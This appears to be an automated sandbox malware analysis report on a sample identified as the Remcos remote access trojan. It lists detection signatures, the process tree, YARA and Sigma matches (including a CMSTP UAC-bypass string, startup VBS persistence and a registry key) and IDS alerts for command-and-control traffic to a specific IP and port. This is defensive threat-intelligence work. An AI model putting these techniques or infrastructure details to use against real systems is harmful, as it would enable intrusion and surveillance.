Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
tyRPPK48Mk.exe

Overview

General Information

Sample name:tyRPPK48Mk.exe
renamed because original name is a hash value
Original sample name:35a056cc53702fd3c3d9f0624eadae17b0e00ac7f18ffd50b6a708cc27183441.exe
Analysis ID:1529033
MD5:94a2b51672c9fb20b8bc7ebfcbf648c0
SHA1:b6bf724c582f4467fb4d87108744cafbdbd1169b
SHA256:35a056cc53702fd3c3d9f0624eadae17b0e00ac7f18ffd50b6a708cc27183441
Tags:exeExpirouser-adrian__luca
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected Remcos RAT
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Remcos
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Contains functionality to behave differently if execute on a Russian/Kazak computer
Creates files in the system32 config directory
Creates files inside the volume driver (system volume information)
Drops VBS files to the startup folder
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries random domain names (often used to prevent blacklisting and sinkholes)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Connects to many different domains
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Executes massive DNS lookups (> 100)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Spawns drivers
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • tyRPPK48Mk.exe (PID: 732 cmdline: "C:\Users\user\Desktop\tyRPPK48Mk.exe" MD5: 94A2B51672C9FB20B8BC7EBFCBF648C0)
    • name.exe (PID: 4420 cmdline: "C:\Users\user\Desktop\tyRPPK48Mk.exe" MD5: 94A2B51672C9FB20B8BC7EBFCBF648C0)
      • svchost.exe (PID: 5692 cmdline: "C:\Users\user\Desktop\tyRPPK48Mk.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • name.exe (PID: 2084 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 94A2B51672C9FB20B8BC7EBFCBF648C0)
        • svchost.exe (PID: 2332 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • name.exe (PID: 6908 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 94A2B51672C9FB20B8BC7EBFCBF648C0)
          • svchost.exe (PID: 4476 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • armsvc.exe (PID: 5692 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 044E4725979E3F506813C6D46BCC5F85)
  • alg.exe (PID: 2912 cmdline: C:\Windows\System32\alg.exe MD5: 6D599A0860A654A2D629A56D388C66FA)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 7172 cmdline: C:\Windows\system32\AppVClient.exe MD5: CE73AC0BEBC9815C9D34668A399D261C)
  • FXSSVC.exe (PID: 7320 cmdline: C:\Windows\system32\fxssvc.exe MD5: 82E1FBAFE5AE9628723F49D8C572AFBC)
  • wscript.exe (PID: 7448 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • name.exe (PID: 7556 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 94A2B51672C9FB20B8BC7EBFCBF648C0)
      • svchost.exe (PID: 7748 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • elevation_service.exe (PID: 7476 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: 65611321C594D4EC8606881B5B2236C0)
  • maintenanceservice.exe (PID: 7584 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: D4047A35D44FF5A878217467E0BC115E)
  • msdtc.exe (PID: 7672 cmdline: C:\Windows\System32\msdtc.exe MD5: 80FB2A9AB41BBA2E660763723BD5C683)
  • PerceptionSimulationService.exe (PID: 7892 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: 8A50E57282AB78C6D3930BA31E2E66D7)
  • perfhost.exe (PID: 7956 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: 39B7A38B4D293A74193E0AFFD1CF7BBC)
  • Locator.exe (PID: 8008 cmdline: C:\Windows\system32\locator.exe MD5: 1668426D4049F247816A6509230B04D6)
  • SensorDataService.exe (PID: 8036 cmdline: C:\Windows\System32\SensorDataService.exe MD5: 39A4234D5B8BA6534DB70A8421277A62)
  • snmptrap.exe (PID: 8084 cmdline: C:\Windows\System32\snmptrap.exe MD5: 77032644518A6E344DB3C45614BB3462)
  • Spectrum.exe (PID: 8124 cmdline: C:\Windows\system32\spectrum.exe MD5: B90A4BF24B298B6114E19987A67C9450)
  • ssh-agent.exe (PID: 1060 cmdline: C:\Windows\System32\OpenSSH\ssh-agent.exe MD5: 528551BC5915FF99C29746E159C1E483)
  • TieringEngineService.exe (PID: 7280 cmdline: C:\Windows\system32\TieringEngineService.exe MD5: 022EEAB6B3A6A0E570E90A480C9C1AEB)
  • AgentService.exe (PID: 7356 cmdline: C:\Windows\system32\AgentService.exe MD5: 085BAFAFBBA6343A8BA8B383CB55A16F)
  • vds.exe (PID: 3288 cmdline: C:\Windows\System32\vds.exe MD5: FD669AD0BA373802EC20BC543357973C)
  • wbengine.exe (PID: 7468 cmdline: "C:\Windows\system32\wbengine.exe" MD5: C9F70CE234FCA9526C1C5BFCDAF44E2B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6aab8:$a1: Remcos restarted by watchdog!
        • 0x6b030:$a3: %02i:%02i:%02i:%03i
        00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
        • 0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
        • 0x6498c:$s1: CoGetObject
        • 0x649a0:$s1: CoGetObject
        • 0x649bc:$s1: CoGetObject
        • 0x6e95e:$s1: CoGetObject
        • 0x6494c:$s2: Elevation:Administrator!new:
        Click to see the 34 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.name.exe.3c50000.1.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          1.2.name.exe.3c50000.1.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            1.2.name.exe.3c50000.1.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              1.2.name.exe.3c50000.1.unpackWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x690b8:$a1: Remcos restarted by watchdog!
              • 0x69630:$a3: %02i:%02i:%02i:%03i
              1.2.name.exe.3c50000.1.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
              • 0x62ff8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
              • 0x62f8c:$s1: CoGetObject
              • 0x62fa0:$s1: CoGetObject
              • 0x62fbc:$s1: CoGetObject
              • 0x6cf5e:$s1: CoGetObject
              • 0x62f4c:$s2: Elevation:Administrator!new:
              Click to see the 46 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 7448, ProcessName: wscript.exe
              Sigma detected: Execution of Suspicious File Type Extension
              Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys
              Sigma detected: Uncommon Svchost Parent Process
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\tyRPPK48Mk.exe", CommandLine: "C:\Users\user\Desktop\tyRPPK48Mk.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\tyRPPK48Mk.exe", ParentImage: C:\Users\user\AppData\Local\directory\name.exe, ParentProcessId: 4420, ParentProcessName: name.exe, ProcessCommandLine: "C:\Users\user\Desktop\tyRPPK48Mk.exe", ProcessId: 5692, ProcessName: svchost.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 7448, ProcessName: wscript.exe
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\tyRPPK48Mk.exe", CommandLine: "C:\Users\user\Desktop\tyRPPK48Mk.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\tyRPPK48Mk.exe", ParentImage: C:\Users\user\AppData\Local\directory\name.exe, ParentProcessId: 4420, ParentProcessName: name.exe, ProcessCommandLine: "C:\Users\user\Desktop\tyRPPK48Mk.exe", ProcessId: 5692, ProcessName: svchost.exe

              Data Obfuscation

              barindex
              Sigma detected: Drops script at startup location
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\directory\name.exe, ProcessId: 4420, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

              Stealing of Sensitive Information

              barindex
              Sigma detected: Remcos
              Source: Registry Key setAuthor: Joe Security: Data: Details: 27 EA 85 E9 2E 71 5C A9 74 66 5C 9B 79 E9 65 B1 1D 7B 49 A9 FE C0 30 EA 22 09 50 CA 24 5D AA 76 66 44 7B 02 9C 7D 59 DB 6D 6A 97 5B CA 8E ED 6F 0C 4A 02 80 D1 D8 7B DB 88 3B 4D F3 65 84 C9 3F , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\svchost.exe, ProcessId: 4476, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-98KSNN\exepath

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-08T15:27:56.766976+020020365941Malware Command and Control Activity Detected192.168.2.449730204.10.160.2126622TCP
              2024-10-08T15:28:00.098295+020020365941Malware Command and Control Activity Detected192.168.2.449733204.10.160.2126622TCP
              2024-10-08T15:28:02.796510+020020365941Malware Command and Control Activity Detected192.168.2.449738204.10.160.2126622TCP
              2024-10-08T15:28:05.317236+020020365941Malware Command and Control Activity Detected192.168.2.449744204.10.160.2126622TCP
              2024-10-08T15:28:07.914367+020020365941Malware Command and Control Activity Detected192.168.2.449752204.10.160.2126622TCP
              2024-10-08T15:28:10.388161+020020365941Malware Command and Control Activity Detected192.168.2.449758204.10.160.2126622TCP
              2024-10-08T15:28:12.896990+020020365941Malware Command and Control Activity Detected192.168.2.449761204.10.160.2126622TCP
              2024-10-08T15:28:15.373843+020020365941Malware Command and Control Activity Detected192.168.2.449762204.10.160.2126622TCP
              2024-10-08T15:28:17.879881+020020365941Malware Command and Control Activity Detected192.168.2.449764204.10.160.2126622TCP
              2024-10-08T15:28:20.556968+020020365941Malware Command and Control Activity Detected192.168.2.449765204.10.160.2126622TCP
              2024-10-08T15:28:23.430139+020020365941Malware Command and Control Activity Detected192.168.2.449766204.10.160.2126622TCP
              2024-10-08T15:28:25.925867+020020365941Malware Command and Control Activity Detected192.168.2.449767204.10.160.2126622TCP
              2024-10-08T15:28:28.424142+020020365941Malware Command and Control Activity Detected192.168.2.449769204.10.160.2126622TCP
              2024-10-08T15:28:31.215454+020020365941Malware Command and Control Activity Detected192.168.2.449771204.10.160.2126622TCP
              2024-10-08T15:28:33.688508+020020365941Malware Command and Control Activity Detected192.168.2.449772204.10.160.2126622TCP
              2024-10-08T15:28:36.208426+020020365941Malware Command and Control Activity Detected192.168.2.449774204.10.160.2126622TCP
              2024-10-08T15:28:39.852780+020020365941Malware Command and Control Activity Detected192.168.2.449783204.10.160.2126622TCP
              2024-10-08T15:28:42.364010+020020365941Malware Command and Control Activity Detected192.168.2.449804204.10.160.2126622TCP
              2024-10-08T15:28:44.882900+020020365941Malware Command and Control Activity Detected192.168.2.449823204.10.160.2126622TCP
              2024-10-08T15:28:47.380482+020020365941Malware Command and Control Activity Detected192.168.2.449845204.10.160.2126622TCP
              2024-10-08T15:28:50.660648+020020365941Malware Command and Control Activity Detected192.168.2.449871204.10.160.2126622TCP
              2024-10-08T15:28:53.318018+020020365941Malware Command and Control Activity Detected192.168.2.449891204.10.160.2126622TCP
              2024-10-08T15:28:55.811449+020020365941Malware Command and Control Activity Detected192.168.2.449912204.10.160.2126622TCP
              2024-10-08T15:28:58.303982+020020365941Malware Command and Control Activity Detected192.168.2.449933204.10.160.2126622TCP
              2024-10-08T15:29:00.779947+020020365941Malware Command and Control Activity Detected192.168.2.449956204.10.160.2126622TCP
              2024-10-08T15:29:03.288853+020020365941Malware Command and Control Activity Detected192.168.2.449978204.10.160.2126622TCP
              2024-10-08T15:29:05.808726+020020365941Malware Command and Control Activity Detected192.168.2.449997204.10.160.2126622TCP
              2024-10-08T15:29:08.282216+020020365941Malware Command and Control Activity Detected192.168.2.450016204.10.160.2126622TCP
              2024-10-08T15:29:10.750660+020020365941Malware Command and Control Activity Detected192.168.2.450037204.10.160.2126622TCP
              2024-10-08T15:29:13.218937+020020365941Malware Command and Control Activity Detected192.168.2.450059204.10.160.2126622TCP
              2024-10-08T15:29:15.709046+020020365941Malware Command and Control Activity Detected192.168.2.450077204.10.160.2126622TCP
              2024-10-08T15:29:18.210532+020020365941Malware Command and Control Activity Detected192.168.2.450096204.10.160.2126622TCP
              2024-10-08T15:29:20.709019+020020365941Malware Command and Control Activity Detected192.168.2.450115204.10.160.2126622TCP
              2024-10-08T15:29:23.140948+020020365941Malware Command and Control Activity Detected192.168.2.450136204.10.160.2126622TCP
              2024-10-08T15:29:25.582997+020020365941Malware Command and Control Activity Detected192.168.2.450143204.10.160.2126622TCP
              2024-10-08T15:29:28.241267+020020365941Malware Command and Control Activity Detected192.168.2.450148204.10.160.2126622TCP
              2024-10-08T15:29:30.615404+020020365941Malware Command and Control Activity Detected192.168.2.450153204.10.160.2126622TCP
              2024-10-08T15:29:32.958174+020020365941Malware Command and Control Activity Detected192.168.2.450157204.10.160.2126622TCP
              2024-10-08T15:29:35.268925+020020365941Malware Command and Control Activity Detected192.168.2.450162204.10.160.2126622TCP
              2024-10-08T15:29:37.586267+020020365941Malware Command and Control Activity Detected192.168.2.450168204.10.160.2126622TCP
              2024-10-08T15:29:39.902521+020020365941Malware Command and Control Activity Detected192.168.2.450175204.10.160.2126622TCP
              2024-10-08T15:29:42.113325+020020365941Malware Command and Control Activity Detected192.168.2.450181204.10.160.2126622TCP
              2024-10-08T15:29:44.300850+020020365941Malware Command and Control Activity Detected192.168.2.450187204.10.160.2126622TCP
              2024-10-08T15:29:46.494672+020020365941Malware Command and Control Activity Detected192.168.2.450192204.10.160.2126622TCP
              2024-10-08T15:29:48.650001+020020365941Malware Command and Control Activity Detected192.168.2.450198204.10.160.2126622TCP
              2024-10-08T15:29:51.137660+020020365941Malware Command and Control Activity Detected192.168.2.450201204.10.160.2126622TCP
              2024-10-08T15:29:53.345689+020020365941Malware Command and Control Activity Detected192.168.2.450205204.10.160.2126622TCP
              2024-10-08T15:29:55.457123+020020365941Malware Command and Control Activity Detected192.168.2.450209204.10.160.2126622TCP
              2024-10-08T15:29:57.548989+020020365941Malware Command and Control Activity Detected192.168.2.450215204.10.160.2126622TCP
              2024-10-08T15:29:59.621390+020020365941Malware Command and Control Activity Detected192.168.2.450218204.10.160.2126622TCP
              2024-10-08T15:30:01.698073+020020365941Malware Command and Control Activity Detected192.168.2.450221204.10.160.2126622TCP
              2024-10-08T15:30:03.705202+020020365941Malware Command and Control Activity Detected192.168.2.450226204.10.160.2126622TCP
              2024-10-08T15:30:05.708880+020020365941Malware Command and Control Activity Detected192.168.2.450233204.10.160.2126622TCP
              2024-10-08T15:30:07.688886+020020365941Malware Command and Control Activity Detected192.168.2.450239204.10.160.2126622TCP
              2024-10-08T15:30:09.662973+020020365941Malware Command and Control Activity Detected192.168.2.450244204.10.160.2126622TCP
              2024-10-08T15:30:11.637453+020020365941Malware Command and Control Activity Detected192.168.2.450249204.10.160.2126622TCP
              2024-10-08T15:30:15.325227+020020365941Malware Command and Control Activity Detected192.168.2.450255204.10.160.2126622TCP
              2024-10-08T15:30:17.258612+020020365941Malware Command and Control Activity Detected192.168.2.450261204.10.160.2126622TCP
              2024-10-08T15:30:19.142709+020020365941Malware Command and Control Activity Detected192.168.2.450267204.10.160.2126622TCP
              2024-10-08T15:30:21.082418+020020365941Malware Command and Control Activity Detected192.168.2.450273204.10.160.2126622TCP
              2024-10-08T15:30:22.974713+020020365941Malware Command and Control Activity Detected192.168.2.450277204.10.160.2126622TCP
              2024-10-08T15:30:24.851571+020020365941Malware Command and Control Activity Detected192.168.2.450280204.10.160.2126622TCP
              2024-10-08T15:30:26.897213+020020365941Malware Command and Control Activity Detected192.168.2.450285204.10.160.2126622TCP
              2024-10-08T15:30:28.962688+020020365941Malware Command and Control Activity Detected192.168.2.450288204.10.160.2126622TCP
              2024-10-08T15:30:30.784491+020020365941Malware Command and Control Activity Detected192.168.2.450291204.10.160.2126622TCP
              2024-10-08T15:30:32.605724+020020365941Malware Command and Control Activity Detected192.168.2.450297204.10.160.2126622TCP
              2024-10-08T15:30:34.888556+020020365941Malware Command and Control Activity Detected192.168.2.450303204.10.160.2126622TCP
              2024-10-08T15:30:36.694367+020020365941Malware Command and Control Activity Detected192.168.2.450310204.10.160.2126622TCP
              2024-10-08T15:30:38.493326+020020365941Malware Command and Control Activity Detected192.168.2.450313204.10.160.2126622TCP
              2024-10-08T15:30:40.290648+020020365941Malware Command and Control Activity Detected192.168.2.450319204.10.160.2126622TCP
              2024-10-08T15:30:42.070723+020020365941Malware Command and Control Activity Detected192.168.2.450324204.10.160.2126622TCP
              2024-10-08T15:30:43.848396+020020365941Malware Command and Control Activity Detected192.168.2.450327204.10.160.2126622TCP
              2024-10-08T15:30:45.633959+020020365941Malware Command and Control Activity Detected192.168.2.450331204.10.160.2126622TCP
              2024-10-08T15:30:47.428905+020020365941Malware Command and Control Activity Detected192.168.2.450334204.10.160.2126622TCP
              2024-10-08T15:30:49.159065+020020365941Malware Command and Control Activity Detected192.168.2.450337204.10.160.2126622TCP
              2024-10-08T15:30:50.900226+020020365941Malware Command and Control Activity Detected192.168.2.450340204.10.160.2126622TCP
              2024-10-08T15:30:52.618787+020020365941Malware Command and Control Activity Detected192.168.2.450344204.10.160.2126622TCP
              2024-10-08T15:30:54.317039+020020365941Malware Command and Control Activity Detected192.168.2.456516204.10.160.2126622TCP
              2024-10-08T15:30:56.003026+020020365941Malware Command and Control Activity Detected192.168.2.456521204.10.160.2126622TCP
              2024-10-08T15:30:58.116800+020020365941Malware Command and Control Activity Detected192.168.2.456524204.10.160.2126622TCP
              2024-10-08T15:30:59.814778+020020365941Malware Command and Control Activity Detected192.168.2.456526204.10.160.2126622TCP
              2024-10-08T15:31:01.525387+020020365941Malware Command and Control Activity Detected192.168.2.456529204.10.160.2126622TCP
              2024-10-08T15:31:03.189218+020020365941Malware Command and Control Activity Detected192.168.2.456534204.10.160.2126622TCP
              2024-10-08T15:31:04.868931+020020365941Malware Command and Control Activity Detected192.168.2.456536204.10.160.2126622TCP
              2024-10-08T15:31:06.992236+020020365941Malware Command and Control Activity Detected192.168.2.456538204.10.160.2126622TCP
              2024-10-08T15:31:08.698794+020020365941Malware Command and Control Activity Detected192.168.2.456540204.10.160.2126622TCP
              2024-10-08T15:31:10.352292+020020365941Malware Command and Control Activity Detected192.168.2.456541204.10.160.2126622TCP
              2024-10-08T15:31:12.025193+020020365941Malware Command and Control Activity Detected192.168.2.456543204.10.160.2126622TCP
              2024-10-08T15:31:13.670110+020020365941Malware Command and Control Activity Detected192.168.2.456544204.10.160.2126622TCP
              2024-10-08T15:31:15.299944+020020365941Malware Command and Control Activity Detected192.168.2.456545204.10.160.2126622TCP
              2024-10-08T15:31:16.907636+020020365941Malware Command and Control Activity Detected192.168.2.456547204.10.160.2126622TCP
              2024-10-08T15:31:18.533080+020020365941Malware Command and Control Activity Detected192.168.2.456548204.10.160.2126622TCP
              2024-10-08T15:31:20.720404+020020365941Malware Command and Control Activity Detected192.168.2.456549204.10.160.2126622TCP
              2024-10-08T15:31:22.355554+020020365941Malware Command and Control Activity Detected192.168.2.456550204.10.160.2126622TCP
              2024-10-08T15:31:23.954810+020020365941Malware Command and Control Activity Detected192.168.2.456551204.10.160.2126622TCP
              2024-10-08T15:31:25.548822+020020365941Malware Command and Control Activity Detected192.168.2.456553204.10.160.2126622TCP
              2024-10-08T15:31:27.186498+020020365941Malware Command and Control Activity Detected192.168.2.456554204.10.160.2126622TCP
              2024-10-08T15:31:28.767697+020020365941Malware Command and Control Activity Detected192.168.2.456555204.10.160.2126622TCP
              2024-10-08T15:31:30.392544+020020365941Malware Command and Control Activity Detected192.168.2.456556204.10.160.2126622TCP
              2024-10-08T15:31:31.997961+020020365941Malware Command and Control Activity Detected192.168.2.456557204.10.160.2126622TCP
              2024-10-08T15:31:33.602793+020020365941Malware Command and Control Activity Detected192.168.2.456558204.10.160.2126622TCP
              2024-10-08T15:31:35.235008+020020365941Malware Command and Control Activity Detected192.168.2.456559204.10.160.2126622TCP
              2024-10-08T15:31:36.798716+020020365941Malware Command and Control Activity Detected192.168.2.456560204.10.160.2126622TCP
              2024-10-08T15:31:38.384997+020020365941Malware Command and Control Activity Detected192.168.2.456562204.10.160.2126622TCP
              2024-10-08T15:31:39.942786+020020365941Malware Command and Control Activity Detected192.168.2.456565204.10.160.2126622TCP
              2024-10-08T15:31:41.526900+020020365941Malware Command and Control Activity Detected192.168.2.456567204.10.160.2126622TCP
              2024-10-08T15:31:43.103667+020020365941Malware Command and Control Activity Detected192.168.2.456569204.10.160.2126622TCP
              2024-10-08T15:31:44.681258+020020365941Malware Command and Control Activity Detected192.168.2.456573204.10.160.2126622TCP
              2024-10-08T15:31:46.238828+020020365941Malware Command and Control Activity Detected192.168.2.456577204.10.160.2126622TCP
              2024-10-08T15:31:47.785898+020020365941Malware Command and Control Activity Detected192.168.2.456580204.10.160.2126622TCP
              2024-10-08T15:31:49.330624+020020365941Malware Command and Control Activity Detected192.168.2.456584204.10.160.2126622TCP
              2024-10-08T15:31:50.919135+020020365941Malware Command and Control Activity Detected192.168.2.456587204.10.160.2126622TCP
              2024-10-08T15:31:52.493302+020020365941Malware Command and Control Activity Detected192.168.2.456590204.10.160.2126622TCP
              2024-10-08T15:31:54.170938+020020365941Malware Command and Control Activity Detected192.168.2.456593204.10.160.2126622TCP
              2024-10-08T15:31:55.706849+020020365941Malware Command and Control Activity Detected192.168.2.456596204.10.160.2126622TCP
              2024-10-08T15:31:57.240661+020020365941Malware Command and Control Activity Detected192.168.2.456598204.10.160.2126622TCP
              2024-10-08T15:31:59.745594+020020365941Malware Command and Control Activity Detected192.168.2.456602204.10.160.2126622TCP
              2024-10-08T15:32:03.009052+020020365941Malware Command and Control Activity Detected192.168.2.456603204.10.160.2126622TCP
              2024-10-08T15:32:05.511413+020020365941Malware Command and Control Activity Detected192.168.2.456604204.10.160.2126622TCP
              2024-10-08T15:32:08.029545+020020365941Malware Command and Control Activity Detected192.168.2.456606204.10.160.2126622TCP
              2024-10-08T15:32:10.526331+020020365941Malware Command and Control Activity Detected192.168.2.456607204.10.160.2126622TCP
              2024-10-08T15:32:13.022007+020020365941Malware Command and Control Activity Detected192.168.2.456608204.10.160.2126622TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-08T15:29:50.469266+020020516541A Network Trojan was detected192.168.2.4539391.1.1.153UDP
              2024-10-08T15:30:11.184242+020020516541A Network Trojan was detected192.168.2.4593741.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
